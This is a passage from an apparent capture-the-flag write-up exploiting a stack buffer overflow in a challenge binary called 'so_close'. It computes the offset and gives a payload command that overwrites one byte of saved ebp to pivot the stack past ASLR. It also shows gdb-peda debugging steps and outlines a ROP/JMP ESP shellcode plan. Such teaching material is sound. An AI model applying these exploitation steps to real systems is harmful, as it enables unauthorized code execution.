Yes, it read 272 bytes from our input (nbytes=a1-buf-4=bp+0x8-bp+0x10C-4=0x110=272 or you can figure it by fuzzing), we can perform the buffer overflow attack.

Let check something

ASLR is on! We have to find a clever way to solve this challenge than overwrite eip to jump back to shell address cuz the address is random.

I decided to overflow last one bit of ebp, since the address of ebp is nearly like stack address, overwrite last bit of it with \x0a (you can choose another small value) will make it jump back near the start of stack, leave instruction will mov esp,ebp then pop ebp => we can control esp => control ret.

Let debug to see if it would affect:

Choose the payload:

python -c "print 'A'*268+'\x0a'" > /tmp/tsu

debug so_close with gdb-peda:

gdb so_close

Set breakpoint at call read function:

gdb-peda$ br *0x8048467

input payload to it:

gdb-peda$ r < /tmp/tsu

So when ret instruction of totally_secure function execute, our program will jump to nearly start of the stack.

Step 2: Building payload with ROP and SHELLCODE to increase probability success

In above step, we know if we overwrite last bit of ebp with small value we can jump to nearly start of the stack, so we want it jump to one of the bunch gadget POP-RET chain with instruction JMP ESP, padding byte \x90 and shellcode. Look at this picture you will know why: